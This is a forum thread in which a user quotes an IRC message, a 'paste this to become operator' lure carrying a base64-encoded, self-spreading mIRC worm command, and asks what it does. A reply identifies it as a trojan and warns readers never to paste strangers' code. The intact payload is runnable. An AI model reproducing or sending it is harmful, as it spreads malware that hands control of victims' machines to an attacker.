[ neo-br @ 28.08.2007. 00:10 ] @
Prilikom ulaska na jedna kanal dobio sam poruku sljedece sadrzine :

<_RobInhO_> Wanna be an OPERATOR in #barani ? copy/paste this-> //write  .  $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpvaW4gI2JhbmR1bmcgfCAubXNnICRuaWNrIFdhbm5hIGJlIGFuIE9QRVJBVE9SIGluICRjaGFuID8gY29weS9wYXN0ZSB0aGlzLT4DNyAvL3dyaXRlIKAuoCAkICQrIGRlY29kZSggJCsgJGVuY29kZSgkcmVhZCgkc2NyaXB0LG4sMSksbSkgJCsgLG0pICRjaHIoMTI0KSAubG9hZCAtcnMgoC6gICRjaHIoMTI0KSAvL21vZGUgJCAkKyBtZSArUiB9,m) | .load -rs  .  | //mode $me +R

E sad ima li ovaj kod ikakvog znacenja i sta bi se desilo da ga iskopiram?
Znam da je neka fora za neki virus ili sta vec nego me samo zanima???
Hvala
[ ColdKeyboard @ 02.09.2007. 13:28 ] @
To je stari mIRC trojanac, kada ukucas taj kod onda osoba koja zna da ti imas taj trojan moze da koristi tvoj mIRC a samim time i celi tvoj racunar za sta god pozeli... da ti brise fajlove, pise umjesto tebe, reklamira, gasi racunar i jos mnogo toga.

Kada god dobijete ovakve poruke od nepoznatih ljudi ili pogotovo na domacim serverima a poruka je na stranom jeziku
samo ih ignorisite i NIKADA nemojte kucati neki kod koji vam druga osoba da sem ako niste 100% sigurni da je ta osoba
help operater ili vas prijatelj.

Raspravljali smo vec o tom virusu ovdje i ja sam detaljno objasni sav taj kod kako radi, sta radi i cemu sluzi
tako da ne bi bilo lose da malo prelistas starije teme.